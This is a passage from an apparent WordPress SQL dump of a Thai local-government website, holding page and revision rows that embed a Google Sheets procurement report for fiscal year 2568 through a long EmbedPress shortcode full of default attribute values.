nftbutton_typography_font_weight=\'false\' nftbutton_typography_text_transform=\'false\' nftbutton_typography_font_style=\'false\' nftbutton_typography_text_decoration=\'false\' nftbutton_typography_line_height=\'false\' nftbutton_typography_letter_spacing=\'false\' nftbutton_typography_word_spacing=\'false\' nft_loadmore_color=\'false\' nft_loadmore_typography_typography=\'false\' nft_loadmore_typography_font_family=\'false\' nft_loadmore_typography_font_size=\'false\' nft_loadmore_typography_font_weight=\'false\' nft_loadmore_typography_text_transform=\'false\' nft_loadmore_typography_font_style=\'false\' nft_loadmore_typography_text_decoration=\'false\' nft_loadmore_typography_line_height=\'false\' nft_loadmore_typography_letter_spacing=\'false\' nft_loadmore_typography_word_spacing=\'false\' nft_loadmore_bgcolor=\'false\' nftrank_label_color=\'false\' nftrank_label_typography_typography=\'false\' nftrank_label_typography_font_family=\'false\' nftrank_label_typography_font_size=\'false\' nftrank_label_typography_font_weight=\'false\' nftrank_label_typography_text_transform=\'false\' nftrank_label_typography_font_style=\'false\' nftrank_label_typography_text_decoration=\'false\' nftrank_label_typography_line_height=\'false\' nftrank_label_typography_letter_spacing=\'false\' nftrank_label_typography_word_spacing=\'false\' nftrank_color=\'false\' nftrank_border_color=\'false\' nftrank_typography_typography=\'false\' nftrank_typography_font_family=\'false\' nftrank_typography_font_size=\'false\' nftrank_typography_font_weight=\'false\' nftrank_typography_text_transform=\'false\' nftrank_typography_font_style=\'false\' nftrank_typography_text_decoration=\'false\' nftrank_typography_line_height=\'false\' nftrank_typography_letter_spacing=\'false\' nftrank_typography_word_spacing=\'false\' nftdetail_title_color=\'false\' nftdetail_title_typography_typography=\'false\' nftdetail_title_typography_font_family=\'false\' nftdetail_title_typography_font_size=\'false\' nftdetail_title_typography_font_weight=\'false\' nftdetail_title_typography_text_transform=\'false\' nftdetail_title_typography_font_style=\'false\' nftdetail_title_typography_text_decoration=\'false\' nftdetail_title_typography_line_height=\'false\' nftdetail_title_typography_letter_spacing=\'false\' nftdetail_title_typography_word_spacing=\'false\' nftdetail_color=\'false\' nftdetail_typography_typography=\'false\' nftdetail_typography_font_family=\'false\' nftdetail_typography_font_size=\'false\' nftdetail_typography_font_weight=\'false\' nftdetail_typography_text_transform=\'false\' nftdetail_typography_font_style=\'false\' nftdetail_typography_text_decoration=\'false\' nftdetail_typography_line_height=\'false\' nftdetail_typography_letter_spacing=\'false\' nftdetail_typography_word_spacing=\'false\' nftdetail_link_color=\'false\' nftdetail_link_typography_typography=\'false\' nftdetail_link_typography_font_family=\'false\' nftdetail_link_typography_font_size=\'false\' nftdetail_link_typography_font_weight=\'false\' nftdetail_link_typography_text_transform=\'false\' nftdetail_link_typography_font_style=\'false\' nftdetail_link_typography_text_decoration=\'false\' nftdetail_link_typography_line_height=\'false\' nftdetail_link_typography_letter_spacing=\'false\' nftdetail_link_typography_word_spacing=\'false\' _title=\'false\' _element_width=\'false\' _element_width_tablet=\'false\' _element_width_mobile=\'false\' _element_custom_width=\'false\' _grid_column=\'false\' _grid_column_custom=\'false\' _grid_row=\'false\' _grid_row_custom=\'false\' _flex_align_self=\'false\' _flex_order=\'false\' _flex_order_custom=\'false\' _flex_size=\'false\' _flex_grow=\'false\' _flex_shrink=\'false\' _element_vertical_align=\'false\' _position=\'false\' _offset_orientation_h=\'false\' _offset_x=\'false\' _offset_x_end=\'false\' _offset_orientation_v=\'false\' _offset_y=\'false\' _offset_y_end=\'false\' _z_index=\'false\' _element_id=\'false\' _css_classes=\'false\' _element_cache=\'false\' _animation=\'false\' _animation_tablet=\'false\' _animation_mobile=\'false\' animation_duration=\'false\' _animation_delay=\'false\' _transform_rotate_popover=\'false\' _transform_rotateZ_effect=\'false\' _transform_rotateZ_effect_tablet=\'false\' _transform_rotateZ_effect_mobile=\'false\' _transform_rotate_3d=\'false\' _transform_rotateX_effect=\'false\' _transform_rotateX_effect_tablet=\'false\' _transform_rotateX_effect_mobile=\'false\' _transform_rotateY_effect=\'false\' _transform_rotateY_effect_tablet=\'false\' _transform_rotateY_effect_mobile=\'false\' _transform_perspective_effect=\'false\' _transform_perspective_effect_tablet=\'false\' _transform_perspective_effect_mobile=\'false\' _transform_translate_popover=\'false\' _transform_translateX_effect=\'false\' _transform_translateX_effect_tablet=\'false\' _transform_translateX_effect_mobile=\'false\' _transform_translateY_effect=\'false\' _transform_translateY_effect_tablet=\'false\' _transform_translateY_effect_mobile=\'false\' _transform_scale_popover=\'false\' _transform_keep_proportions=\'yes\' _transform_scale_effect=\'false\' _transform_scale_effect_tablet=\'false\' _transform_scale_effect_mobile=\'false\' _transform_scaleX_effect=\'false\' _transform_scaleX_effect_tablet=\'false\' _transform_scaleX_effect_mobile=\'false\' _transform_scaleY_effect=\'false\' _transform_scaleY_effect_tablet=\'false\' _transform_scaleY_effect_mobile=\'false\' _transform_skew_popover=\'false\' _transform_skewX_effect=\'false\' _transform_skewX_effect_tablet=\'false\' _transform_skewX_effect_mobile=\'false\' _transform_skewY_effect=\'false\' _transform_skewY_effect_tablet=\'false\' _transform_skewY_effect_mobile=\'false\' _transform_flipX_effect=\'false\' _transform_flipY_effect=\'false\' _transform_rotate_popover_hover=\'false\' _transform_rotateZ_effect_hover=\'false\' _transform_rotateZ_effect_hover_tablet=\'false\' _transform_rotateZ_effect_hover_mobile=\'false\' _transform_rotate_3d_hover=\'false\' _transform_rotateX_effect_hover=\'false\' _transform_rotateX_effect_hover_tablet=\'false\' _transform_rotateX_effect_hover_mobile=\'false\' _transform_rotateY_effect_hover=\'false\' _transform_rotateY_effect_hover_tablet=\'false\' _transform_rotateY_effect_hover_mobile=\'false\' _transform_perspective_effect_hover=\'false\' _transform_perspective_effect_hover_tablet=\'false\' _transform_perspective_effect_hover_mobile=\'false\' _transform_translate_popover_hover=\'false\' _transform_translateX_effect_hover=\'false\' _transform_translateX_effect_hover_tablet=\'false\' _transform_translateX_effect_hover_mobile=\'false\' _transform_translateY_effect_hover=\'false\' _transform_translateY_effect_hover_tablet=\'false\' _transform_translateY_effect_hover_mobile=\'false\' _transform_scale_popover_hover=\'false\' _transform_keep_proportions_hover=\'yes\' _transform_scale_effect_hover=\'false\' _transform_scale_effect_hover_tablet=\'false\' _transform_scale_effect_hover_mobile=\'false\' _transform_scaleX_effect_hover=\'false\' _transform_scaleX_effect_hover_tablet=\'false\' _transform_scaleX_effect_hover_mobile=\'false\' _transform_scaleY_effect_hover=\'false\' _transform_scaleY_effect_hover_tablet=\'false\' _transform_scaleY_effect_hover_mobile=\'false\' _transform_skew_popover_hover=\'false\' _transform_skewX_effect_hover=\'false\' _transform_skewX_effect_hover_tablet=\'false\' _transform_skewX_effect_hover_mobile=\'false\' _transform_skewY_effect_hover=\'false\' _transform_skewY_effect_hover_tablet=\'false\' _transform_skewY_effect_hover_mobile=\'false\' _transform_flipX_effect_hover=\'false\' _transform_flipY_effect_hover=\'false\' motion_fx_transform_x_anchor_point=\'false\' motion_fx_transform_y_anchor_point=\'false\' _background_background=\'false\' _background_color=\'false\' _background_color_stop=\'false\' _background_color_b=\'false\' _background_color_b_stop=\'false\' _background_gradient_type=\'false\' _background_gradient_angle=\'false\' _background_gradient_position=\'false\' _background_image=\'false\' _background_position=\'false\' _background_xpos=\'false\' _background_ypos=\'false\' _background_attachment=\'false\' _background_repeat=\'false\' _background_size=\'false\' _background_bg_width=\'false\' _background_video_link=\'false\' _background_video_start=\'false\' _background_video_end=\'false\' _background_play_once=\'false\' _background_play_on_mobile=\'false\' _background_privacy_mode=\'false\' _background_video_fallback=\'false\' _background_slideshow_gallery=\'false\' _background_slideshow_loop=\'false\' _background_slideshow_slide_duration=\'false\' _background_slideshow_slide_transition=\'false\' _background_slideshow_transition_duration=\'false\' _background_slideshow_background_size=\'false\' _background_slideshow_background_position=\'false\' _background_slideshow_lazyload=\'false\' _background_slideshow_ken_burns=\'false\' _background_slideshow_ken_burns_zoom_direction=\'false\' _background_hover_background=\'false\' _background_hover_color=\'false\' _background_hover_color_stop=\'false\' _background_hover_color_b=\'false\' _background_hover_color_b_stop=\'false\' _background_hover_gradient_type=\'false\' _background_hover_gradient_angle=\'false\' _background_hover_gradient_position=\'false\' _background_hover_image=\'false\' _background_hover_position=\'false\' _background_hover_xpos=\'false\' _background_hover_ypos=\'false\' _background_hover_attachment=\'false\' _background_hover_repeat=\'false\' _background_hover_size=\'false\' _background_hover_bg_width=\'false\' _background_hover_video_link=\'false\' _background_hover_video_start=\'false\' _background_hover_video_end=\'false\' _background_hover_play_once=\'false\' _background_hover_play_on_mobile=\'false\' _background_hover_privacy_mode=\'false\' _background_hover_video_fallback=\'false\' _background_hover_slideshow_gallery=\'false\' _background_hover_slideshow_loop=\'false\' _background_hover_slideshow_slide_duration=\'false\' _background_hover_slideshow_slide_transition=\'false\' _background_hover_slideshow_transition_duration=\'false\' _background_hover_slideshow_background_size=\'false\' _background_hover_slideshow_background_position=\'false\' _background_hover_slideshow_lazyload=\'false\' _background_hover_slideshow_ken_burns=\'false\' _background_hover_slideshow_ken_burns_zoom_direction=\'false\' _border_border=\'false\' _border_width=\'false\' _border_color=\'false\' _box_shadow_box_shadow_type=\'false\' _box_shadow_box_shadow=\'false\' _box_shadow_box_shadow_position=\'false\' _border_hover_border=\'false\' _border_hover_width=\'false\' _border_hover_color=\'false\' _box_shadow_hover_box_shadow_type=\'false\' _box_shadow_hover_box_shadow=\'false\' _box_shadow_hover_box_shadow_position=\'false\' _mask_switch=\'false\' _mask_shape=\'false\' _mask_image=\'false\' _mask_notice=\'false\' _mask_size=\'false\' _mask_size_scale=\'false\' _mask_position=\'false\' _mask_position_x=\'false\' _mask_position_y=\'false\' _mask_repeat=\'false\' hide_desktop=\'false\' hide_tablet=\'false\' hide_mobile=\'false\']https://docs.google.com/spreadsheets/d/1Z4focaRNpQBLiyIorbOdzccfYfzwwXlp/edit?usp=sharing&#038;ouid=116408890257525538205&#038;rtpof=true&#038;sd=true[/embedpress]','รานการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ.2568','','publish','closed','closed','','elementor-1558','','','2025-07-01 14:29:25','2025-07-01 07:29:25','',0,'http://pakhaeng.ssk.in.th/?page_id=1558',0,'page','',0),
(1559,1,'2025-07-01 14:16:38','2025-07-01 07:16:38','','Elementor #1558','','inherit','closed','closed','','1558-revision-v1','','','2025-07-01 14:16:38','2025-07-01 07:16:38','',1558,'http://pakhaeng.ssk.in.th/?p=1559',0,'revision','',0),
(1560,1,'2025-07-01 14:20:12','2025-07-01 07:20:12','','Elementor #1558','','inherit','closed','closed','','1558-revision-v1','','','2025-07-01 14:20:12','2025-07-01 07:20:12','',1558,'http://pakhaeng.ssk.in.th/?p=1560',0,'revision','',0),
(1561,1,'2025-07-01 14:20:12','2025-07-01 07:20:12','','Elementor #1558','','inherit','closed','closed','','1558-revision-v1','','','2025-07-01 14:20:12','2025-07-01 07:20:12','',1558,'http://pakhaeng.ssk.in.th/?p=1561',0,'revision','',0),
(1562,1,'2025-07-01 14:20:12','2025-07-01 07:20:12','[embedpress embedpress_embeded_link=\'https://docs.google.com/spreadsheets/d/1Z4focaRNpQBLiyIorbOdzccfYfzwwXlp/edit?gid=1698444854#gid=1698444854\' prefix_nftcreator=\'false\' prefix_nftprice=\'false\' prefix_nftlastsale=\'false\' label_nftbutton=\'false\' loadmorelabel=\'false\' label_nftrank=\'false\' label_nftdetails=\'false\' instafeedFollowBtnLabel=\'false\' instafeedPostsCountText=\'false\' instafeedFollowersCountText=\'false\' instafeedPopupFollowBtnLabel=\'false\' instafeedLoadmoreLabel=\'false\' cPopupButtonText=\'false\' adWidth=\'false\' adHeight=\'false\' adStart=\'false\' adSkipButtonAfter=\'false\' embedpress_protection_message=\'false\' embedpress_lock_content_error_message=\'false\' embedpress_password_placeholder=\'false\' embedpress_submit_button_text=\'false\' embedpress_submit_Unlocking_text=\'false\' embedpress_lock_content_heading=\'false\' embedpress_lock_content_sub_heading=\'false\' embedpress_lock_content_footer_message=\'false\' width=\'1500\' embedpress_pro_embeded_source=\'default\' instafeedFeedType=\'false\' instafeedAccountType=\'false\' embedpress_pro_embeded_nft_type=\'false\' embedpress_audio_video_auto_pause=\'false\' spotify_theme=\'false\' emberpress_custom_player=\'false\' custom_payer_preset=\'false\' embedpress_pro_video_start_time=\'false\' embedpress_pro_youtube_end_time=\'false\' embedpress_player_color=\'false\' embedpress_pro_vimeo_auto_play=\'false\' embedpress_pro_vimeo_autopause=\'false\' embedpress_pro_vimeo_dnt=\'false\' embedpress_pro_youtube_auto_play=\'false\' embedpress_pro_youtube_mute=\'false\' embedpress_pro_youtube_display_controls=\'false\' embedpress_pro_youtube_enable_fullscreen_button=\'false\' embedpress_pro_youtube_display_video_annotations=\'false\' embedpress_pro_youtube_progress_bar_color=\'false\' embedpress_pro_youtube_force_closed_captions=\'false\' embedpress_pro_youtube_modest_branding=\'false\' embepress_player_restart=\'false\' embepress_player_rewind=\'false\' embepress_player_fast_forward=\'false\' embepress_player_tooltip=\'false\' embepress_player_hide_controls=\'false\' embepress_player_download=\'false\' embepress_player_always_on_top=\'false\' embedpress_pro_youtube_display_related_videos=\'false\' embedpress_player_poster_thumbnail=\'false\' embedpress_pro_youtube_logo=\'false\' embedpress_pro_youtube_logo_size=\'false\' embedpress_pro_youtube_logo_custom_dimension=\'false\' embedpress_pro_youtube_logo_xpos=\'false\' embedpress_pro_youtube_logo_ypos=\'false\' embedpress_pro_youtube_logo_opacity=\'false\' embedpress_pro_youtube_logo_opacity_hover=\'false\' embedpress_pro_youtube_cta=\'false\' embedpress_pro_vimeo_color=\'false\' embedpress_pro_vimeo_display_title=\'false\' embedpress_pro_vimeo_display_author=\'false\' embedpress_pro_vimeo_avatar=\'false\' embedpress_pro_vimeo_loop=\'false\' embedpress_pro_vimeo_logo=\'false\' embedpress_pro_vimeo_logo_size=\'false\' embedpress_pro_vimeo_logo_custom_dimension=\'false\' embedpress_pro_vimeo_logo_xpos=\'false\' embedpress_pro_vimeo_logo_ypos=\'false\' embedpress_pro_vimeo_logo_opacity=\'false\' embedpress_pro_vimeo_logo_opacity_hover=\'false\' embedpress_pro_vimeo_cta=\'false\' embedpress_pro_wistia_auto_play=\'false\' embedpress_pro_wistia_color=\'false\' embedpress_pro_wistia_fullscreen_button=\'false\' embedpress_pro_wistia_small_play_button=\'false\' embedpress_pro_wistia_captions=\'false\' embedpress_pro_wistia_captions_enabled_by_default=\'false\' embedpress_pro_wistia_playbar=\'false\' embedpress_pro_wistia_volume_control=\'false\' embedpress_pro_wistia_volume=\'false\' embedpress_pro_wistia_logo=\'false\' embedpress_pro_wistia_logo_size=\'false\' embedpress_pro_wistia_logo_custom_dimension=\'false\' embedpress_pro_wistia_logo_xpos=\'false\' embedpress_pro_wistia_logo_ypos=\'false\' embedpress_pro_wistia_logo_opacity=\'false\' embedpress_pro_wistia_logo_opacity_hover=\'false\' embedpress_pro_wistia_cta=\'false\' embedpress_pro_soundcloud_visual=\'false\' embedpress_pro_soundcloud_color=\'false\' embedpress_pro_soundcloud_autoplay=\'false\' embedpress_pro_soundcloud_share_button=\'false\' embedpress_pro_soundcloud_comments=\'false\' embedpress_pro_soundcloud_artwork=\'false\' embedpress_pro_soundcloud_play_count=\'false\' embedpress_pro_soundcloud_user_name=\'false\' embedpress_pro_soundcloud_buy_button=\'false\' embedpress_pro_soundcloud_download_button=\'false\' embedpress_pro_dailymotion_ui_logo=\'false\' embedpress_pro_dailymotion_autoplay=\'false\' embedpress_pro_dailymotion_play_on_mobile=\'false\' embedpress_pro_dailymotion_mute=\'false\' embedpress_pro_dailymotion_player_control=\'false\' embedpress_pro_dailymotion_video_info=\'false\' embedpress_pro_dailymotion_control_color=\'false\' embedpress_pro_dailymotion_logo=\'false\' embedpress_pro_dailymotion_logo_size=\'false\' embedpress_pro_dailymotion_logo_custom_dimension=\'false\' embedpress_pro_dailymotion_logo_xpos=\'false\' embedpress_pro_dailymotion_logo_ypos=\'false\' embedpress_pro_dailymotion_logo_opacity=\'false\' embedpress_pro_dailymotion_logo_opacity_hover=\'false\' embedpress_pro_dailymotion_cta=\'false\' embedpress_pro_twitch_autoplay=\'false\' embedpress_pro_fs=\'false\' embedpress_pro_twitch_chat=\'false\' embedpress_pro_twitch_mute=\'false\' embedpress_pro_twitch_theme=\'false\' embedpress_pro_twitch_logo=\'false\' embedpress_pro_twitch_logo_size=\'false\' embedpress_pro_twitch_logo_custom_dimension=\'false\' embedpress_pro_twitch_logo_xpos=\'false\' embedpress_pro_twitch_logo_ypos=\'false\' embedpress_pro_twitch_logo_opacity=\'false\' embedpress_pro_twitch_logo_opacity_hover=\'false\' embedpress_pro_twitch_cta=\'false\' limit=\'false\' orderby=\'false\' ytChannelLayout=\'false\' pagesize=\'false\' columns=\'false\' gapbetweenvideos=\'false\' pagination=\'false\' yt_sub_channel=\'false\' yt_sub_text=\'false\' yt_sub_layout=\'false\' yt_sub_theme=\'false\' yt_sub_count=\'false\' yt_lc_show=\'false\' layout=\'false\' preset=\'false\' nftperrow=\'false\' gapbetweenitem=\'false\' collectionname=\'false\' nftimage=\'false\' nfttitle=\'false\' nftcreator=\'false\' nftprice=\'false\' nftlastsale=\'false\' nftbutton=\'false\' loadmore=\'false\' itemperpage=\'false\' nftrank=\'false\' nftdetails=\'false\' instafeedProfileImage=\'false\' instafeedProfileImageUrl=\'false\' instafeedFollowBtn=\'false\' instafeedPostsCount=\'false\' instafeedFollowersCount=\'false\' instafeedAccName=\'false\' instaLayout=\'false\' instafeedColumns=\'false\' instafeedColumnsGap=\'false\' embedpress_instafeed_slide_show=\'false\' embedpress_carousel_autoplay=\'false\' embedpress_carousel_autoplay_speed=\'false\' embedpress_carousel_transition_speed=\'false\' embedpress_carousel_loop=\'false\' embedpress_carousel_arrows=\'false\' embedpress_carousel_spacing=\'false\' instafeedPostsPerPage=\'false\' instafeedTab=\'false\' instafeedLikesCount=\'false\' instafeedCommentsCount=\'false\' instafeedPopup=\'false\' instafeedPopupFollowBtn=\'false\' instafeedLoadmore=\'false\' cEmbedType=\'false\' cPopupButtonTextColor=\'false\' cPopupButtonBGColor=\'false\' calendlyData=\'false\' hideCookieBanner=\'false\' hideEventTypeDetails=\'false\' cBackgroundColor=\'false\' cTextColor=\'false\' cButtonLinkColor=\'false\' theme=\'false\' color=\'false\' coverImageUrl=\'false\' hideDownload=\'false\' playlist=\'false\' playlistContinuous=\'false\' playlistLoop=\'false\' playlistAutoupdate=\'false\' hidePlaylistDescriptions=\'false\' hidePlaylistImages=\'false\' episodeImagePosition=\'false\' showChaptersImage=\'false\' hideLikes=\'false\' hideComments=\'false\' hideSharing=\'false\' hideLogo=\'false\' hideEpisodeDescription=\'false\' mode=\'false\' playerAutoplay=\'false\' delay=\'false\' repeat=\'false\' backgroundColor=\'false\' expiration=\'false\' adManager=\'false\' adSource=\'false\' adFileUrl=\'false\' adFileUrl1=\'false\' adXPosition=\'false\' adYPosition=\'false\' adUrl=\'false\' adSkipButton=\'false\' embedpress_lock_content=\'false\' embedpress_protection_type=\'false\' embedpress_select_roles=\'false\' embedpress_lock_content_password=\'false\' embedpress_enable_footer_message=\'false\' embedpress_content_share=\'false\' embedpress_content_share_position=\'false\' embedpress_content_title=\'false\' embedpress_content_descripiton=\'false\' embedpress_content_share_custom_thumbnail=\'false\' embedpress_share_facebook=\'false\' embedpress_share_twitter=\'false\' embedpress_share_pinterest=\'false\' embedpress_share_linkedin=\'false\' height=\'700\' align=\'false\' align_tablet=\'false\' align_mobile=\'false\' nft_item_background_color=\'false\' nft_collectionname_color=\'false\' nft_collectionname_hover_color=\'false\' nft_collectionname_typography_typography=\'false\' nft_collectionname_typography_font_family=\'false\' nft_collectionname_typography_font_size=\'false\' nft_collectionname_typography_font_weight=\'false\' nft_collectionname_typography_text_transform=\'false\' nft_collectionname_typography_font_style=\'false\' nft_collectionname_typography_text_decoration=\'false\' nft_collectionname_typography_line_height=\'false\' nft_collectionname_typography_letter_spacing=\'false\' nft_collectionname_typography_word_spacing=\'false\' nft_title_color=\'false\' nft_title_typography_typography=\'false\' nft_title_typography_font_family=\'false\' nft_title_typography_font_size=\'false\' nft_title_typography_font_weight=\'false\' nft_title_typography_text_transform=\'false\' nft_title_typography_font_style=\'false\' nft_title_typography_text_decoration=\'false\' nft_title_typography_line_height=\'false\' nft_title_typography_letter_spacing=\'false\' nft_title_typography_word_spacing=\'false\' nft_creator_color=\'false\' nft_creator_typography_typography=\'false\' nft_creator_typography_font_family=\'false\' nft_creator_typography_font_size=\'false\' nft_creator_typography_font_weight=\'false\' nft_creator_typography_text_transform=\'false\' nft_creator_typography_font_style=\'false\' nft_creator_typography_text_decoration=\'false\' nft_creator_typography_line_height=\'false\' nft_creator_typography_letter_spacing=\'false\' nft_creator_typography_word_spacing=\'false\' nft_created_by_color=\'false\' nft_created_by_typography_typography=\'false\' nft_created_by_typography_font_family=\'false\' nft_created_by_typography_font_size=\'false\' nft_created_by_typography_font_weight=\'false\' nft_created_by_typography_text_transform=\'false\' nft_created_by_typography_font_style=\'false\' nft_created_by_typography_text_decoration=\'false\' nft_created_by_typography_line_height=\'false\' nft_created_by_typography_letter_spacing=\'false\' nft_created_by_typography_word_spacing=\'false\' nft_price_color=\'false\' nft_price_typography_typography=\'false\' nft_price_typography_font_family=\'false\' nft_price_typography_font_size=\'false\' nft_price_typography_font_weight=\'false\' nft_price_typography_text_transform=\'false\' nft_price_typography_font_style=\'false\' nft_price_typography_text_decoration=\'false\' nft_price_typography_line_height=\'false\' nft_price_typography_letter_spacing=\'false\' nft_price_typography_word_spacing=\'false\' nft_last_sale_color=\'false\' nft_last_sale_typography_typography=\'false\' nft_last_sale_typography_font_family=\'false\' nft_last_sale_typography_font_size=\'false\' nft_last_sale_typography_font_weight=\'false\' nft_last_sale_typography_text_transform=\'false\' nft_last_sale_typography_font_style=\'false\' nft_last_sale_typography_text_decoration=\'false\' nft_last_sale_typography_line_height=\'false\' nft_last_sale_typography_letter_spacing=\'false\' nft_last_sale_typography_word_spacing=\'false\' nftbutton_color=\'false\' nftbutton_bg_color=\'false\' nftbutton_typography_typography=\'false\' nftbutton_typography_font_family=\'false\' nftbutton_typography_font_size=\'false\' nftbutton_typography_font_weight=\'false\' nftbutton_typography_text_transform=\'false\' nftbutton_typography_font_style=\'false\' nftbutton_typography_text_decoration=\'false\' nftbutton_typography_line_height=\'false\' nftbutton_typography_letter_spacing=\'false\' nftbutton_typography_word_spacing=\'false\' nft_loadmore_color=\'false\' nft_loadmore_typography_typography=\'false\' nft_loadmore_typography_font_family=\'false\' nft_loadmore_typography_font_size=\'false\' nft_loadmore_typography_font_weight=\'false\' nft_loadmore_typography_text_transform=\'false\' nft_loadmore_typography_font_style=\'false\' nft_loadmore_typography_text_decoration=\'false\' nft_loadmore_typography_line_height=\'false\' nft_loadmore_typography_letter_spacing=\'false\' nft_loadmore_typography_word_spacing=\'false\' nft_loadmore_bgcolor=\'false\' nftrank_label_color=\'false\' nftrank_label_typography_typography=\'false\' nftrank_label_typography_font_family=\'false\' nftrank_label_typography_font_size=\'false\' nftrank_label_typography_font_weight=\'false\' nftrank_label_typography_text_transform=\'false\' nftrank_label_typography_font_style=\'false\' nftrank_label_typography_text_decoration=\'false\' nftrank_label_typography_line_height=\'false\' nftrank_label_typography_letter_spacing=\'false\' nftrank_label_typography_word_spacing=\'false\' nftrank_color=\'false\' nftrank_border_color=\'false\' nftrank_typography_typography=\'false\' nftrank_typography_font_family=\'false\' nftrank_typography_font_size=\'false\' nftrank_typography_font_weight=\'false\' nftrank_typography_text_transform=\'false\' nftrank_typography_font_style=\'false\' nftrank_typography_text_decoration=\'false\' nftrank_typography_line_height=\'false\' nftrank_typography_letter_spacing=\'false\' nftrank_typography_word_spacing=\'false\' nftdetail_title_color=\'false\' nftdetail_title_typography_typography=\'false\' nftdetail_title_typography_font_family=\'false\' nftdetail_title_typography_font_size=\'false\' nftdetail_title_typography_font_weight=\'false\' nftdetail_title_typography_text_transform=\'false\' nftdetail_title_typography_font_style=\'false\' nftdetail_title_typography_text_decoration=\'false\' nftdetail_title_typography_line_height=\'false\' nftdetail_title_typography_letter_spacing=\'false\' nftdetail_title_typography_word_spacing=\'false\' nftdetail_color=\'false\' nftdetail_typography_typography=\'false\' nftdetail_typography_font_family=\'false\' nftdetail_typography_font_size=\'false\' nftdetail_typography_font_weight=\'false\' nftdetail_typography_text_transform=\'false\' nftdetail_typography_font_style=\'false\' nftdetail_typography_text_decoration=\'false\' nftdetail_typography_line_height=\'false\' nftdetail_typography_letter_spacing=\'false\' nftdetail_typography_word_spacing=\'false\' nftdetail_link_color=\'false\' nftdetail_link_typography_typography=\'false\' nftdetail_link_typography_font_family=\'false\' nftdetail_link_typography_font_size=\'false\' nftdetail_link_typography_font_weight=\'false\' nftdetail_link_typography_text_transform=\'false\' nftdetail_link_typography_font_style=\'false\' nftdetail_link_typography_text_decoration=\'false\' nftdetail_link_typography_line_height=\'false\' nftdetail_link_typography_letter_spacing=\'false\' nftdetail_link_typography_word_spacing=\'false\' _title=\'false\' _element_width=\'false\' _element_width_tablet=\'false\' _element_width_mobile=\'false\' _element_custom_width=\'false\' _grid_column=\'false\' _grid_column_custom=\'false\' _grid_row=\'false\' _grid_row_custom=\'false\' _flex_align_self=\'false\' _flex_order=\'false\' _flex_order_custom=\'false\' _flex_size=\'false\' _flex_grow=\'false\' _flex_shrink=\'false\' _element_vertical_align=\'false\' _position=\'false\' _offset_orientation_h=\'false\' _offset_x=\'false\' _offset_x_end=\'false\' _offset_orientation_v=\'false\' _offset_y=\'false\' _offset_y_end=\'false\' _z_index=\'false\' _element_id=\'false\' _css_classes=\'false\' _element_cache=\'false\' _animation=\'false\' _animation_tablet=\'false\' _animation_mobile=\'false\' animation_duration=\'false\' _animation_delay=\'false\' _transform_rotate_popover=\'false\' _transform_rotateZ_effect=\'false\' _transform_rotateZ_effect_tablet=\'false\' _transform_rotateZ_effect_mobile=\'false\' _transform_rotate_3d=\'false\' _transform_rotateX_effect=\'false\' _transform_rotateX_effect_tablet=\'false\' _transform_rotateX_effect_mobile=\'false\' _transform_rotateY_effect=\'false\' _transform_rotateY_effect_tablet=\'false\' _transform_rotateY_effect_mobile=\'false\' _transform_perspective_effect=\'false\' _transform_perspective_effect_tablet=\'false\' _transform_perspective_effect_mobile=\'false\' _transform_translate_popover=\'false\' _transform_translateX_effect=\'false\' _transform_translateX_effect_tablet=\'false\' _transform_translateX_effect_mobile=\'false\' _transform_translateY_effect=\'false\' _transform_translateY_effect_tablet=\'false\' _transform_translateY_effect_mobile=\'false\' _transform_scale_popover=\'false\' _transform_keep_proportions=\'yes\' _transform_scale_effect=\'false\' _transform_scale_effect_tablet=\'false\' _transform_scale_effect_mobile=\'false\' _transform_scaleX_effect=\'false\' _transform_scaleX_effect_tablet=\'false\' _transform_scaleX_effect_mobile=\'false\' _transform_scaleY_effect=\'false\' _transform_scaleY_effect_tablet=\'false\' _transform_scaleY_effect_mobile=\'false\' _transform_skew_popover=\'false\' _transform_skewX_effect=\'false\' _transform_skewX_effect_tablet=\'false\' _transform_skewX_effect_mobile=\'false\' _transform_skewY_effect=\'false\' _transform_skewY_effect_tablet=\'false\' _transform_skewY_effect_mobile=\'false\' _transform_flipX_effect=\'false\' _transform_flipY_effect=\'false\' _transform_rotate_popover_hover=\'false\' _transform_rotateZ_effect_hover=\'false\' _transform_rotateZ_effect_hover_tablet=\'false\' _transform_rotateZ_effect_hover_mobile=\'false\' _transform_rotate_3d_hover=\'false\' _transform_rotateX_effect_hover=\'false\' _transform_rotateX_effect_hover_tablet=\'false\' _transform_rotateX_effect_hover_mobile=\'false\' _transform_rotateY_effect_hover=\'false\' _transform_rotateY_effect_hover_tablet=\'false\' _transform_rotateY_effect_hover_mobile=\'false\' _transform_perspective_effect_hover=\'false\' _transform_perspective_effect_hover_tablet=\'false\' _transform_perspective_effect_hover_mobile=\'false\' _transform_translate_popover_hover=\'false\' _transform_translateX_effect_hover=\'false\' _transform_translateX_effect_hover_tablet=\'false\' _transform_translateX_effect_hover_mobile=\'false\' _transform_translateY_effect_hover=\'false\' _transform_translateY_effect_hover_tablet=\'false\' _transform_translateY_effect_hover_mobile=\'false\' _transform_scale_popover_hover=\'false\' _transform_keep_proportions_hover=\'yes\' _transform_scale_effect_hover=\'false\' _transform_scale_effect_hover_tablet=\'false\' _transform_scale_effect_hover_mobile=\'false\' _transform_scaleX_effect_hover=\'false\' _transform_scaleX_effect_hover_tablet=\'false\' _transform_scaleX_effect_hover_mobile=\'false\' _transform_scaleY_effect_hover=\'false\' _transform_scaleY_effect_hover_tablet=\'false\' _transform_scaleY_effect_hover_mobile=\'false\' _transform_skew_popover_hover=\'false\' _transform_skewX_effect_hover=\'false\' _transform_skewX_effect_hover_tablet=\'false\' _transform_skewX_effect_hover_mobile=\'false\' _transform_skewY_effect_hover=\'false\' _transform_skewY_effect_hover_tablet=\'false\' _transform_skewY_effect_hover_mobile=\'false\' _transform_flipX_effect_hover=\'false\' _transform_flipY_effect_hover=\'false\' motion_fx_transform_x_anchor_point=\'false\' motion_fx_transform_y_anchor_point=\'false\' _background_background=\'false\' _background_color=\'false\' _background_color_stop=\'false\' _background_color_b=\'false\' _background_color_b_stop=\'false\' _background_gradient_type=\'false\' _background_gradient_angle=\'false\' _background_gradient_position=\'false\' _background_image=\'false\' _background_position=\'false\' _background_xpos=\'false\' _background_ypos=\'false\' _background_attachment=\'false\' _background_repeat=\'false\' _background_size=\'false\' _background_bg_width=\'false\' _background_video_link=\'false\' _background_video_start=\'false\' _background_video_end=\'false\' _background_play_once=\'false\' _background_play_on_mobile=\'false\' 